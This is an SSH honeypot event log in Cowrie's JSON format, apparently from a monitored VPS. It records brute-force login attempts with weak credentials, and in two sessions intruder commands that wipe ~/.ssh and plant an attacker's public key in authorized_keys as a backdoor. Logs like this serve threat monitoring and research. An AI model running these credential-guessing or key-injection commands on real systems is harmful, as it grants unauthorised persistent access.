{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:19:06.773396Z","src_ip":"212.227.235.229","session":"1461f779a1b3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:19:06.774143Z","src_ip":"212.227.235.229","session":"1461f779a1b3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38732,"dst_ip":"1.2.3.4","dst_port":22,"session":"599bff7d1b16","protocol":"ssh","message":"New connection: 212.227.235.229:38732 (1.2.3.4:22) [session: 599bff7d1b16]","sensor":"my-vps","timestamp":"2025-08-31T00:19:11.349529Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:19:11.350206Z","src_ip":"212.227.235.229","session":"599bff7d1b16"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:19:11.651198Z","src_ip":"212.227.235.229","session":"599bff7d1b16"}
{"eventid":"cowrie.login.success","username":"root","password":"pass0000","message":"login attempt [root/pass0000] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:19:12.896576Z","src_ip":"212.227.235.229","session":"599bff7d1b16"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-31T00:19:13.341589Z","src_ip":"212.227.235.229","session":"1461f779a1b3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:19:13.959882Z","src_ip":"212.227.235.229","session":"599bff7d1b16"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:19:13.960589Z","src_ip":"212.227.235.229","session":"599bff7d1b16"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:19:13.961508Z","src_ip":"212.227.235.229","session":"599bff7d1b16"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:19:14.263637Z","src_ip":"212.227.235.229","session":"599bff7d1b16"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:19:14.944313Z","src_ip":"212.227.235.229","session":"599bff7d1b16"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T00:19:14.945010Z","src_ip":"212.227.235.229","session":"599bff7d1b16"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T00:19:15.248573Z","src_ip":"212.227.235.229","session":"599bff7d1b16"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:19:15.249458Z","src_ip":"212.227.235.229","session":"599bff7d1b16"}
{"eventid":"cowrie.session.closed","duration":"9.6","message":"Connection lost after 9.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:19:15.437618Z","src_ip":"212.227.235.229","session":"1461f779a1b3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45030,"dst_ip":"1.2.3.4","dst_port":22,"session":"b960f9c9c647","protocol":"ssh","message":"New connection: 212.227.235.229:45030 (1.2.3.4:22) [session: b960f9c9c647]","sensor":"my-vps","timestamp":"2025-08-31T00:19:15.555923Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:19:15.556824Z","src_ip":"212.227.235.229","session":"b960f9c9c647"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:19:15.858153Z","src_ip":"212.227.235.229","session":"b960f9c9c647"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T00:19:17.153026Z","src_ip":"212.227.235.229","session":"b960f9c9c647"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:19:18.457984Z","src_ip":"212.227.235.229","session":"b960f9c9c647"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50026,"dst_ip":"1.2.3.4","dst_port":22,"session":"71ac4702117f","protocol":"ssh","message":"New connection: 212.227.235.229:50026 (1.2.3.4:22) [session: 71ac4702117f]","sensor":"my-vps","timestamp":"2025-08-31T00:19:19.757447Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:19:19.758347Z","src_ip":"212.227.235.229","session":"71ac4702117f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:19:20.063026Z","src_ip":"212.227.235.229","session":"71ac4702117f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:19:21.323613Z","src_ip":"212.227.235.229","session":"71ac4702117f"}
{"eventid":"cowrie.session.closed","duration":"10.3","message":"Connection lost after 10.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:19:21.682809Z","src_ip":"212.227.235.229","session":"599bff7d1b16"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:19:21.687373Z","src_ip":"212.227.235.229","session":"71ac4702117f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32902,"dst_ip":"1.2.3.4","dst_port":22,"session":"a05a0788fb23","protocol":"ssh","message":"New connection: 212.227.125.160:32902 (1.2.3.4:22) [session: a05a0788fb23]","sensor":"my-vps","timestamp":"2025-08-31T00:19:28.496968Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:19:29.181152Z","src_ip":"212.227.125.160","session":"a05a0788fb23"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:19:29.182053Z","src_ip":"212.227.125.160","session":"a05a0788fb23"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-31T00:19:31.766082Z","src_ip":"212.227.125.160","session":"a05a0788fb23"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:19:33.220321Z","src_ip":"212.227.125.160","session":"a05a0788fb23"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34674,"dst_ip":"1.2.3.4","dst_port":22,"session":"f380c757a353","protocol":"ssh","message":"New connection: 212.227.235.229:34674 (1.2.3.4:22) [session: f380c757a353]","sensor":"my-vps","timestamp":"2025-08-31T00:19:47.520975Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:19:47.521614Z","src_ip":"212.227.235.229","session":"f380c757a353"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:19:47.826260Z","src_ip":"212.227.235.229","session":"f380c757a353"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa0.0.00.","message":"login attempt [root/Aa0.0.00.] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:19:49.083035Z","src_ip":"212.227.235.229","session":"f380c757a353"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:19:49.752911Z","src_ip":"212.227.235.229","session":"f380c757a353"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:19:49.753648Z","src_ip":"212.227.235.229","session":"f380c757a353"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:19:49.754898Z","src_ip":"212.227.235.229","session":"f380c757a353"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:19:50.060311Z","src_ip":"212.227.235.229","session":"f380c757a353"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:19:50.731441Z","src_ip":"212.227.235.229","session":"f380c757a353"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T00:19:50.732219Z","src_ip":"212.227.235.229","session":"f380c757a353"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T00:19:51.038209Z","src_ip":"212.227.235.229","session":"f380c757a353"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:19:51.039260Z","src_ip":"212.227.235.229","session":"f380c757a353"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41082,"dst_ip":"1.2.3.4","dst_port":22,"session":"3122b8b6aad3","protocol":"ssh","message":"New connection: 212.227.235.229:41082 (1.2.3.4:22) [session: 3122b8b6aad3]","sensor":"my-vps","timestamp":"2025-08-31T00:19:51.333094Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:19:51.333968Z","src_ip":"212.227.235.229","session":"3122b8b6aad3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:19:51.634024Z","src_ip":"212.227.235.229","session":"3122b8b6aad3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T00:19:52.880596Z","src_ip":"212.227.235.229","session":"3122b8b6aad3"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:19:54.184434Z","src_ip":"212.227.235.229","session":"3122b8b6aad3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45662,"dst_ip":"1.2.3.4","dst_port":22,"session":"70c6ffedd5b3","protocol":"ssh","message":"New connection: 212.227.235.229:45662 (1.2.3.4:22) [session: 70c6ffedd5b3]","sensor":"my-vps","timestamp":"2025-08-31T00:19:54.483037Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:19:54.483941Z","src_ip":"212.227.235.229","session":"70c6ffedd5b3"}
